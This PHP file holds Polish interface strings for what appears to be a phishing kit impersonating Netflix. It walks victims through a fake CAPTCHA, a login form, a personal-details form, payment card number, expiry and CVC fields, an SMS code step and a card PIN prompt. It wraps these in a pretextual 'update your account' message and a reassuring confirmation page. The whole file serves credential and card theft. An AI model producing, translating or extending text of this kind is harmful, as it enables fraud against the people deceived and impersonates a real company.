<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "pl",
        "xcapt" => "Proszę poświęcić chwilę na rozwiązanie hCaptcha poniżej. Pomaga nam to upewnić się, że jesteś prawdziwym użytkownikiem, a nie botem, zapewniając bezpieczne środowisko dla wszystkich.",
        "xcapt1" => "Proszę zaznaczyć pole CAPTCHA.",
        "xcapt2" => "Weryfikacja",
        "xcapt3" => "Kontynuuj",
        "xmain1" => "Zaloguj się",
        "xmain2" => "E-mail lub numer telefonu",
        "xmain3" => "Proszę wprowadzić prawidłowy adres e-mail lub numer telefonu.",
        "xmain4" => "Hasło",
        "xmain5" => "Twoje hasło musi zawierać od 4 do 60 znaków.",
        "xmain6" => "Zaloguj się",
        "xmain7" => "Zapamiętaj mnie",
        "xmain8" => "Potrzebna pomoc?",
        "xmain9" => "Nowy na Netflix?",
        "xmain10" => " Zarejestruj się teraz.",
        "xmain11" => "Ta strona jest chroniona przez Google reCAPTCHA, aby sprawdzić, czy nie jesteś robotem.",
        "xmain12" => "Dowiedz się więcej.",
        "xinfoz1" => "Dane osobowe",
        "xinfoz2" => "Imię i nazwisko",
        "xinfoz3" => "To pole jest wymagane.",
        "xinfoz4" => "Data urodzenia",
        "xinfoz5" => "Adres",
        "xinfoz6" => "Miasto",
        "xinfoz7" => "Kod pocztowy",
        "xinfoz8" => "Adres e-mail",
        "xinfoz9" => "Numer telefonu",
        "xinfoz10" => "Pola w tym formularzu są wymagane, ponieważ potrzebujemy tych informacji do przetworzenia Twojego żądania.",
        "xinfoz11" => "Kontynuuj",
        "xpay1" => "Skonfiguruj swoją kartę płatniczą",
        "xpay2" => "Numer karty",
        "xpay3" => "Numer karty jest wymagany.",
        "xpay4" => "Data ważności",
        "xpay5" => "Data ważności jest wymagana.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV jest wymagane.",
        "xpay8" => "Szyfrowanie end-to-end",
        "xpay9" => "Kontynuuj",
        "xsms1" => "Weryfikacja",
        "xsms2" => "Dla Twojego bezpieczeństwa musimy upewnić się, że to naprawdę Ty.",
        "xsms3" => "Wyślemy Ci SMS z kodem zabezpieczającym",
        "xsms4" => "Proszę wprowadzić otrzymany kod",
        "xsms5" => "Kod SMS",
        "xsms6" => "Nieprawidłowy kod SMS",
        "xsms7" => "Ten krok jest niezbędny do bezpiecznego przetworzenia Twojego żądania.",
        "xsms8" => "Kontynuuj",
        "xpin1" => "Weryfikacja",
        "xpin2" => "Dla Twojego bezpieczeństwa musimy upewnić się, że to naprawdę Ty.",
        "xpin3" => "Wyślemy Ci SMS z kodem zabezpieczającym",
        "xpin4" => "Proszę wprowadzić PIN swojej karty",
        "xpin5" => "PIN karty",
        "xpin6" => "Nieprawidłowy PIN karty",
        "xpin7" => "Ten krok jest niezbędny do bezpiecznego przetworzenia Twojego żądania.",
        "xpin8" => "Kontynuuj",
        "xexpl1" => "Aktualizacja",
        "xexpl2" => "Mamy nadzieję, że ta wiadomość znajduje Cię w dobrym stanie. Chcielibyśmy poinformować, że jest istotne zaktualizowanie swoich informacji na naszej platformie, aby zagwarantować ciągłe i bezpieczne doświadczenie użytkownika.",
        "xexpl3" => "Aby ulepszyć nasze usługi i zapewnić bezpieczeństwo Twojego konta, prosimy o poświęcenie chwili na zaktualizowanie swoich informacji.",
        "xexpl4" => "Kontynuuj",
        "xconf1" => "Potwierdzenie",
        "xconf2" => "Serdecznie dziękujemy za poświęcenie czasu na zaktualizowanie informacji na naszej platformie. Twoje zaangażowanie w bezpieczeństwo i dokładność danych Twojego konta jest dla nas kluczowe.",
        "xconf3" => "Twoje zmiany zostały pomyślnie zapisane. Teraz możesz w pełni korzystać z naszej platformy z najnowszymi i zaktualizowanymi informacjami.",
        "xconf4" => "Kontynuuj",
        "xload1" => "Trwa przetwarzanie...",
        "xload2" => "Nie opuszczaj tej strony.",
        "xfoot1" => "Pytania? Skontaktuj się z nami.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Centrum Pomocy",
        "xfoot4" => "Warunki korzystania",
        "xfoot5" => "Prywatność",
        "xfoot6" => "Preferencje plików cookie",
        "xfoot7" => "Informacje korporacyjne",
        "xfoot8" => "Polski"
    );

    return $lang[$phrase];
}
?>